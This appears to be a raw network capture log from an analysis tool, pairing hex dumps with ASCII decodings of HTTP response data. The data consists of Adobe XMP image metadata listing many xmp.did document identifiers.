                                                                                                                                                                                    2023-01-05 07:58:12 UTC9622INData Raw: 31 38 30 38 33 43 37 35 34 46 44 38 45 34 39 39 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 33 38 30 31 31 37 34 30 37 32 30 36 38 31 31 38 30 42 43 45 33 34 31 35 45 39 42 46 45 46 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 33 38 30 31 31 37 34 30 37 32 30 36 38 31 31 38 32 32 41 38 37 44 37 34 30 42 36 39 30 45 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 33 38 30 31 31 37 34 30 37 32 30 36 38 31 31 38 32 32 41 41 37 41 33 31 39 31 35 30 39 36 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 33 38 30 31 31 37 34 30 37 32 30 36 38 31 31 38 32 32 41 42 46 30 36 31 32 44 46 35 31 45 41 3c 2f 72 64 66 3a
                                                                                                                                                                                    Data Ascii: 18083C754FD8E4996</rdf:li> <rdf:li>xmp.did:038011740720681180BCE3415E9BFEFC</rdf:li> <rdf:li>xmp.did:0380117407206811822A87D740B690EF</rdf:li> <rdf:li>xmp.did:0380117407206811822AA7A319150968</rdf:li> <rdf:li>xmp.did:0380117407206811822ABF0612DF51EA</rdf:
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9638INData Raw: 36 35 42 43 46 39 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 37 44 31 34 46 30 33 33 41 32 30 36 38 31 31 38 39 39 31 44 37 38 39 36 30 46 45 37 38 35 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 37 44 36 38 35 46 33 39 32 34 44 45 31 31 31 38 46 45 42 44 33 34 39 43 39 32 36 38 45 36 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 37 45 32 41 39 41 41 36 42 32 30 36 38 31 31 38 38 43 36 41 33 30 33 41 37 32 37 33 32 46 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 37 62 35 63 33 34 30 2d 38 39 32 35 2d 61 32 34 37 2d 39 31 61 32 2d 62 32 31 63 39 35 64 34 63 66 62 62 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72
                                                                                                                                                                                    Data Ascii: 65BCF91</rdf:li> <rdf:li>xmp.did:07D14F033A2068118991D78960FE7855</rdf:li> <rdf:li>xmp.did:07D685F3924DE1118FEBD349C9268E6E</rdf:li> <rdf:li>xmp.did:07E2A9AA6B20681188C6A303A72732FA</rdf:li> <rdf:li>xmp.did:07b5c340-8925-a247-91a2-b21c95d4cfbb</rdf:li> <r
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9646INData Raw: 36 38 31 31 39 39 34 43 39 34 35 30 34 46 35 34 30 45 31 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 41 38 30 31 31 37 34 30 37 32 30 36 38 31 31 39 45 36 31 41 39 34 30 32 32 37 31 31 31 35 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 41 38 30 31 31 37 34 30 37 32 30 36 38 31 31 41 37 33 32 45 42 36 31 30 43 38 35 44 37 41 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 41 38 30 31 31 37 34 30 37 32 30 36 38 31 31 41 42 30 38 45 36 46 39 33 33 35 30 32 34 42 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 41 38 30 31 31 37 34 30 37 32 30 36 38 31 31 41 43 31 37 38 30 46 35 37 45 33 36 38 37 33 44 3c 2f 72
                                                                                                                                                                                    Data Ascii: 6811994C94504F540E15</rdf:li> <rdf:li>xmp.did:0A801174072068119E61A94022711155</rdf:li> <rdf:li>xmp.did:0A80117407206811A732EB610C85D7A5</rdf:li> <rdf:li>xmp.did:0A80117407206811AB08E6F9335024B2</rdf:li> <rdf:li>xmp.did:0A80117407206811AC1780F57E36873D</r
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9662INData Raw: 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 31 41 37 31 39 33 35 41 46 44 36 44 45 30 31 31 38 33 36 45 44 39 33 43 44 36 36 30 30 31 34 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 31 41 39 35 31 35 32 35 45 33 41 44 45 34 31 31 41 42 38 31 45 42 30 43 38 31 38 45 32 38 41 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 31 41 43 37 36 45 32 35 35 42 32 34 36 38 31 31 38 37 31 46 42 41 35 43 43 33 39 36 37 42 43 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 31 41 44 44 43 32 44 34 32 30 32 30 36 38 31 31 41 42 36 31 39 39 36 44 35 46 36 41 41 33 32 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64
                                                                                                                                                                                    Data Ascii: rdf:li> <rdf:li>xmp.did:1A71935AFD6DE011836ED93CD6600141</rdf:li> <rdf:li>xmp.did:1A951525E3ADE411AB81EB0C818E28AC</rdf:li> <rdf:li>xmp.did:1AC76E255B246811871FBA5CC3967BC0</rdf:li> <rdf:li>xmp.did:1ADDC2D420206811AB61996D5F6AA328</rdf:li> <rdf:li>xmp.did
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9678INData Raw: 44 30 46 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 32 41 39 45 31 46 36 36 45 31 45 36 44 46 31 31 41 33 45 37 46 37 37 41 36 35 43 36 31 34 41 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 32 41 41 30 41 46 42 39 46 44 39 44 45 31 31 31 41 44 44 32 39 42 36 38 34 45 34 35 45 35 38 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 32 41 41 35 42 39 30 39 38 38 34 43 31 31 45 31 39 45 33 37 46 32 43 37 46 44 36 37 39 38 35 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 32 41 44 42 34 34 36 33 31 42 32 30 36 38 31 31 41 36 31 33 44 42 32 36 39 46 45 46 35 32 34 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78
                                                                                                                                                                                    Data Ascii: D0F6</rdf:li> <rdf:li>xmp.did:2A9E1F66E1E6DF11A3E7F77A65C614A5</rdf:li> <rdf:li>xmp.did:2AA0AFB9FD9DE111ADD29B684E45E581</rdf:li> <rdf:li>xmp.did:2AA5B909884C11E19E37F2C7FD67985A</rdf:li> <rdf:li>xmp.did:2ADB44631B206811A613DB269FEF524D</rdf:li> <rdf:li>x
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9686INData Raw: 69 3e 78 6d 70 2e 64 69 64 3a 33 31 41 44 44 41 38 37 37 34 32 31 36 38 31 31 38 43 31 34 41 33 36 45 35 36 36 45 31 32 44 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 33 31 42 30 39 35 31 43 30 31 32 33 36 38 31 31 38 32 32 41 44 30 37 43 37 43 43 34 33 38 44 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 33 31 43 43 43 33 37 39 46 30 39 45 31 31 44 46 41 35 34 46 38 34 45 31 41 34 32 35 45 30 46 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 33 31 45 34 42 33 46 32 46 44 39 44 45 31 31 31 41 44 44 32 39 42 36 38 34 45 34 35 45 35 38 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 33 31 45 35 31 41 46 30 31 31 32 30 36
                                                                                                                                                                                    Data Ascii: i>xmp.did:31ADDA87742168118C14A36E566E12DA</rdf:li> <rdf:li>xmp.did:31B0951C01236811822AD07C7CC438D7</rdf:li> <rdf:li>xmp.did:31CCC379F09E11DFA54F84E1A425E0FD</rdf:li> <rdf:li>xmp.did:31E4B3F2FD9DE111ADD29B684E45E581</rdf:li> <rdf:li>xmp.did:31E51AF011206
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9702INData Raw: 39 65 38 38 32 31 39 38 64 31 61 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 33 66 62 30 32 64 38 65 2d 61 61 65 30 2d 34 31 39 38 2d 61 34 30 30 2d 30 38 35 66 65 64 36 31 61 63 34 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 33 66 64 37 61 64 65 65 2d 36 39 64 33 2d 34 30 39 61 2d 38 39 33 35 2d 66 64 37 32 30 65 34 36 62 34 31 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 34 30 30 37 44 46 42 38 32 37 32 30 36 38 31 31 41 34 38 32 46 37 45 33 32 32 39 42 31 31 30 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 34 30 31 32 32 38 44 45 30 37 32 30 36 38 31 31 38 43 31 34 42 38 37 30 37 44 35 37 30 41 35 43 3c 2f 72
                                                                                                                                                                                    Data Ascii: 9e882198d1a3</rdf:li> <rdf:li>xmp.did:3fb02d8e-aae0-4198-a400-085fed61ac46</rdf:li> <rdf:li>xmp.did:3fd7adee-69d3-409a-8935-fd720e46b413</rdf:li> <rdf:li>xmp.did:4007DFB827206811A482F7E3229B110C</rdf:li> <rdf:li>xmp.did:401228DE072068118C14B8707D570A5C</r
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9718INData Raw: 6c 69 3e 78 6d 70 2e 64 69 64 3a 34 66 31 65 62 39 33 37 2d 30 62 37 63 2d 34 64 63 36 2d 62 30 37 61 2d 66 64 32 38 37 38 30 32 36 39 39 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 34 66 33 36 32 36 35 33 2d 34 33 35 35 2d 65 66 34 36 2d 61 65 35 31 2d 38 35 38 65 34 64 61 34 66 31 34 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 34 66 35 62 62 35 61 62 2d 64 36 38 32 2d 66 34 34 32 2d 61 34 37 34 2d 64 37 63 35 39 39 37 64 34 63 65 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 34 66 38 38 32 30 65 62 2d 61 31 39 61 2d 34 64 64 61 2d 39 32 31 39 2d 35 38 65 64 66 33 65 38 36 61 35 63 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e
                                                                                                                                                                                    Data Ascii: li>xmp.did:4f1eb937-0b7c-4dc6-b07a-fd2878026993</rdf:li> <rdf:li>xmp.did:4f362653-4355-ef46-ae51-858e4da4f143</rdf:li> <rdf:li>xmp.did:4f5bb5ab-d682-f442-a474-d7c5997d4ce8</rdf:li> <rdf:li>xmp.did:4f8820eb-a19a-4dda-9219-58edf3e86a5c</rdf:li> <rdf:li>xmp.
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9725INData Raw: 61 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 35 36 30 33 37 43 38 45 30 37 32 30 36 38 31 31 38 32 32 41 46 43 31 39 44 36 45 35 36 31 35 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 35 36 30 39 36 33 38 35 32 35 36 30 45 31 31 31 39 36 30 46 42 31 39 46 42 33 39 42 32 33 31 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 35 36 31 30 32 61 65 39 2d 63 62 33 64 2d 34 64 65 64 2d 61 63 30 61 2d 66 34 66 62 30 36 34 30 37 61 30 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 35 36 31 30 63 61 34 30 2d 62 39 30 64 2d 35 65 34 34 2d 38 36 38 32 2d 39 31 61 33 63 35 66 38 38 37 62 66 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66
                                                                                                                                                                                    Data Ascii: a</rdf:li> <rdf:li>xmp.did:56037C8E07206811822AFC19D6E5615D</rdf:li> <rdf:li>xmp.did:560963852560E111960FB19FB39B2310</rdf:li> <rdf:li>xmp.did:56102ae9-cb3d-4ded-ac0a-f4fb06407a07</rdf:li> <rdf:li>xmp.did:5610ca40-b90d-5e44-8682-91a3c5f887bf</rdf:li> <rdf
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9741INData Raw: 38 31 31 45 37 41 45 39 39 42 42 42 41 32 32 33 35 46 35 37 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 36 35 46 30 38 38 32 45 41 31 32 30 36 38 31 31 41 41 45 44 45 45 34 42 43 32 33 38 32 31 45 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 36 36 30 46 44 42 37 42 32 39 32 30 36 38 31 31 38 41 36 44 39 34 46 34 30 36 34 38 35 39 45 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 36 36 31 44 42 34 37 36 39 34 32 35 36 38 31 31 38 43 31 34 41 43 31 44 45 42 38 46 45 32 42 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 36 36 32 43 38 33 35 45 45 37 32 31 36 38 31 31 38 43 31 34 41 33 36 45 35 36 36 45 31 32 44 41 3c 2f
                                                                                                                                                                                    Data Ascii: 811E7AE99BBBA2235F57F</rdf:li> <rdf:li>xmp.did:65F0882EA1206811AAEDEE4BC23821EF</rdf:li> <rdf:li>xmp.did:660FDB7B292068118A6D94F4064859E3</rdf:li> <rdf:li>xmp.did:661DB476942568118C14AC1DEB8FE2BE</rdf:li> <rdf:li>xmp.did:662C835EE72168118C14A36E566E12DA</
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9757INData Raw: 31 45 34 42 34 39 31 45 38 30 39 44 30 43 43 39 42 31 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 37 34 38 34 39 34 64 39 2d 30 66 39 62 2d 34 65 36 63 2d 38 65 64 65 2d 31 37 66 62 32 32 66 37 34 32 39 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 37 34 38 43 45 39 41 38 30 39 32 30 36 38 31 31 39 32 42 30 39 37 36 34 33 37 46 36 34 35 39 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 37 34 42 39 37 46 30 41 45 31 32 30 36 38 31 31 41 46 46 44 44 44 35 36 43 46 43 35 36 39 30 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 37 34 43 39 46 38 36 33 35 38 37 39 45 34 31 31 42 41 37 42 46 44 34 37 36 35 30 35 38 34 38 42
                                                                                                                                                                                    Data Ascii: 1E4B491E809D0CC9B17</rdf:li> <rdf:li>xmp.did:748494d9-0f9b-4e6c-8ede-17fb22f74293</rdf:li> <rdf:li>xmp.did:748CE9A80920681192B0976437F6459A</rdf:li> <rdf:li>xmp.did:74B97F0AE1206811AFFDDD56CFC56907</rdf:li> <rdf:li>xmp.did:74C9F8635879E411BA7BFD476505848B
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9765INData Raw: 41 46 36 37 44 31 31 44 46 38 32 36 39 42 42 39 33 46 30 33 44 43 41 32 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 37 44 35 45 31 42 38 41 45 41 45 46 44 46 31 31 38 41 39 44 41 46 37 35 41 41 44 33 34 45 38 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 37 44 37 31 35 33 38 44 34 45 33 38 45 30 31 31 38 34 31 31 45 43 35 46 33 34 33 31 32 35 36 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 37 44 37 33 34 37 39 35 32 36 32 30 36 38 31 31 39 32 42 30 42 31 41 44 31 35 32 36 45 38 44 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 37 44 38 43 42 41 39 42 46 33 41 46 44 46 31 31 42 32 44 38 39 42 42 38 45 34 32 42 34 43
                                                                                                                                                                                    Data Ascii: AF67D11DF8269BB93F03DCA24</rdf:li> <rdf:li>xmp.did:7D5E1B8AEAEFDF118A9DAF75AAD34E89</rdf:li> <rdf:li>xmp.did:7D71538D4E38E0118411EC5F3431256E</rdf:li> <rdf:li>xmp.did:7D7347952620681192B0B1AD1526E8D3</rdf:li> <rdf:li>xmp.did:7D8CBA9BF3AFDF11B2D89BB8E42B4C
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9781INData Raw: 42 46 45 35 31 31 38 36 44 45 38 34 43 31 43 46 32 46 30 46 34 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 38 42 45 37 39 46 31 42 45 32 32 37 36 38 31 31 38 43 31 34 41 46 39 44 32 37 33 35 41 34 38 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 38 42 46 33 37 31 34 33 39 38 32 32 36 38 31 31 38 32 32 41 39 45 34 31 38 46 34 35 35 43 35 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 38 42 46 38 37 37 42 38 30 37 32 30 36 38 31 31 39 32 42 30 45 39 30 44 30 34 38 45 41 37 32 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 38 43 30 46 34 45 45 36 32 31 43 43 31 31 36 38 38 38 35 35 38 43 30 36 37 34 34 30 32 30 37 35 3c
                                                                                                                                                                                    Data Ascii: BFE51186DE84C1CF2F0F42</rdf:li> <rdf:li>xmp.did:8BE79F1BE22768118C14AF9D2735A483</rdf:li> <rdf:li>xmp.did:8BF3714398226811822A9E418F455C5D</rdf:li> <rdf:li>xmp.did:8BF877B80720681192B0E90D048EA72C</rdf:li> <rdf:li>xmp.did:8C0F4EE621CC116888558C0674402075<
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9797INData Raw: 64 3a 39 39 30 33 61 32 36 38 2d 61 38 61 64 2d 34 39 36 64 2d 61 35 39 39 2d 36 66 61 34 31 64 36 62 32 63 32 65 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 39 39 31 64 32 35 39 34 2d 65 31 63 37 2d 34 30 36 31 2d 61 64 63 61 2d 61 36 61 32 36 31 64 30 33 30 32 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 39 39 34 32 42 30 45 44 44 37 43 34 45 30 31 31 39 42 42 31 45 31 37 45 39 37 44 34 42 37 35 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 39 39 34 33 45 38 41 42 37 41 35 33 31 31 45 31 42 45 33 44 46 43 45 37 46 44 38 34 45 33 43 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 39 39 34 35 35 41 38 37 31 34 32 30 36
                                                                                                                                                                                    Data Ascii: d:9903a268-a8ad-496d-a599-6fa41d6b2c2e</rdf:li> <rdf:li>xmp.did:991d2594-e1c7-4061-adca-a6a261d03027</rdf:li> <rdf:li>xmp.did:9942B0EDD7C4E0119BB1E17E97D4B75C</rdf:li> <rdf:li>xmp.did:9943E8AB7A5311E1BE3DFCE7FD84E3C6</rdf:li> <rdf:li>xmp.did:99455A8714206
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9805INData Raw: 36 38 31 31 38 32 32 41 39 45 34 31 38 46 34 35 35 43 35 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 41 31 39 35 45 42 32 42 45 34 32 30 36 38 31 31 39 31 30 39 42 34 37 38 33 39 36 38 31 33 33 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 41 31 39 43 42 37 46 42 32 38 32 30 36 38 31 31 41 34 38 32 46 37 45 33 32 32 39 42 31 31 30 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 41 31 41 42 46 39 33 33 30 38 32 30 36 38 31 31 38 46 36 32 42 30 39 39 35 46 42 41 44 31 37 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 41 31 41 44 46 33 46 30 33 32 32 31 36 38 31 31 38 44 42 42 43 34 35 32 41 38 42 33 34 44 30 43 3c 2f 72
                                                                                                                                                                                    Data Ascii: 6811822A9E418F455C5D</rdf:li> <rdf:li>xmp.did:A195EB2BE42068119109B4783968133A</rdf:li> <rdf:li>xmp.did:A19CB7FB28206811A482F7E3229B110C</rdf:li> <rdf:li>xmp.did:A1ABF933082068118F62B0995FBAD170</rdf:li> <rdf:li>xmp.did:A1ADF3F0322168118DBBC452A8B34D0C</r
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9821INData Raw: 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 42 41 35 30 44 45 38 32 31 42 32 33 36 38 31 31 38 32 32 41 44 30 37 43 37 43 43 34 33 38 44 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 42 41 35 35 44 31 30 38 44 42 32 31 36 38 31 31 38 30 38 33 41 34 30 37 38 36 45 36 31 37 46 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 42 41 37 34 34 31 31 37 30 38 32 30 36 38 31 31 38 30 38 33 39 43 37 45 38 39 37 37 35 41 45 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 42 41 38 32 46 31 35 43 31 34 32 30 36 38 31 31 38 44 42 42 42 38 38 39 35 37 39 31 35 34 30 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 42
                                                                                                                                                                                    Data Ascii: f:li> <rdf:li>xmp.did:BA50DE821B236811822AD07C7CC438D7</rdf:li> <rdf:li>xmp.did:BA55D108DB2168118083A40786E617F9</rdf:li> <rdf:li>xmp.did:BA7441170820681180839C7E89775AE4</rdf:li> <rdf:li>xmp.did:BA82F15C142068118DBBB8895791540D</rdf:li> <rdf:li>xmp.did:B
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9837INData Raw: 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 44 30 39 46 39 46 31 44 33 30 32 30 36 38 31 31 39 39 34 43 42 41 37 45 46 34 46 30 44 41 38 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 44 30 42 31 43 46 43 42 46 30 32 30 36 38 31 31 41 33 31 33 39 43 46 39 41 31 42 39 37 30 38 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 44 30 43 34 30 45 46 33 35 43 36 45 45 31 31 31 42 30 36 38 46 31 35 39 34 36 44 46 32 38 41 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 44 30 44 32 37 46 33 39 38 36 33 31 36 38 31 31 41 36 31 33 46 42 31 30 30 36 38 45 39 38 44 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 44 30 46 46 30 33 34 42
                                                                                                                                                                                    Data Ascii: rdf:li>xmp.did:D09F9F1D30206811994CBA7EF4F0DA82</rdf:li> <rdf:li>xmp.did:D0B1CFCBF0206811A3139CF9A1B97083</rdf:li> <rdf:li>xmp.did:D0C40EF35C6EE111B068F15946DF28AE</rdf:li> <rdf:li>xmp.did:D0D27F3986316811A613FB10068E98D9</rdf:li> <rdf:li>xmp.did:D0FF034B
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9845INData Raw: 3e 78 6d 70 2e 64 69 64 3a 44 38 45 31 32 42 43 34 41 35 38 39 44 46 31 31 39 42 35 35 43 45 44 45 38 32 41 34 37 35 39 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 44 38 45 44 46 41 37 30 37 30 38 44 31 31 45 31 38 32 43 31 39 34 39 34 46 41 34 37 41 35 31 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 44 38 46 37 34 34 33 39 30 46 32 30 36 38 31 31 38 30 38 33 45 37 31 39 36 43 35 30 38 34 39 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 44 39 30 43 46 30 30 37 35 35 32 30 36 38 31 31 39 35 31 35 45 36 38 44 41 31 41 35 37 46 33 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 44 39 33 35 42 33 46 37 34 37 33 44 45 35
                                                                                                                                                                                    Data Ascii: >xmp.did:D8E12BC4A589DF119B55CEDE82A47594</rdf:li> <rdf:li>xmp.did:D8EDFA70708D11E182C19494FA47A514</rdf:li> <rdf:li>xmp.did:D8F744390F2068118083E7196C508495</rdf:li> <rdf:li>xmp.did:D90CF007552068119515E68DA1A57F30</rdf:li> <rdf:li>xmp.did:D935B3F7473DE5
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9861INData Raw: 34 45 32 46 36 32 31 34 44 39 32 43 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 33 32 31 35 37 46 44 30 41 32 32 36 38 31 31 38 44 42 42 43 34 35 32 41 38 42 33 34 44 30 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 33 33 42 31 38 45 44 41 32 31 31 45 33 31 31 42 45 33 35 39 43 41 31 45 45 39 35 33 43 33 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 33 33 44 34 30 43 46 42 42 32 31 36 38 31 31 39 39 34 43 45 38 33 42 42 42 43 38 36 44 37 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 33 33 45 39 30 34 34 44 39 42 39 44 46 31 31 41 35 44 41 45 33 34 33 31 44 35 42 35 43 31 33 3c 2f 72 64 66 3a 6c 69 3e 